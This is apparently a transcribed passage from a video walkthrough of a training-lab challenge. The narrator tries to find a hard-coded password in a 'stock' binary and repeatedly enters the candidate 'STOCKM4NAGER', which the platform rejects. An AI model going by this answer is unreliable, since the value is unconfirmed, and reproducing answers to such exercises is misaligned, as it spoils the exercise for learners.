asking for the stock file. This is the one. And the next is, what is the password for stock binary? That is stock manager. Isn't this a password? That would be odd. What is the password for stock binary? This is the password, isn't it? Let's copy, paste. Let's refresh the page. I think something might have happened to the page. Guide mode. Let's go down, provide it back. What's the password for the stock binary? Yeah, this is the password, man. What's wrong here? Let's copy this, paste it here. Let's check the hint. Look near the string that prompts for the password. Yeah, this is a password. Or this one. It's not going to be this, it has to be this. Or do we have to write it in clear text? This is weird. What is the password for the stock binary? Yeah, this is a password, man. Is it taking it as O or 0? Well, that's weird. It's not accepting it as a password. I'll keep the screenshot. And I don't know what the next question is going to be. Or should I turn this off? And okay, so we have to turn it on, and then we can provide the answers. Let's go back. And it's still not accepting. STOCKM4NAGER. Let's shoot it to the support. But that answer is going to be, I don't know why it's not accepting that. And we don't know the last question. So once I will check that, I'll keep that in comment. Well, thanks for watching, guys. Have a great year. Have a great day. And don't forget to subscribe. Thanks for watching so far.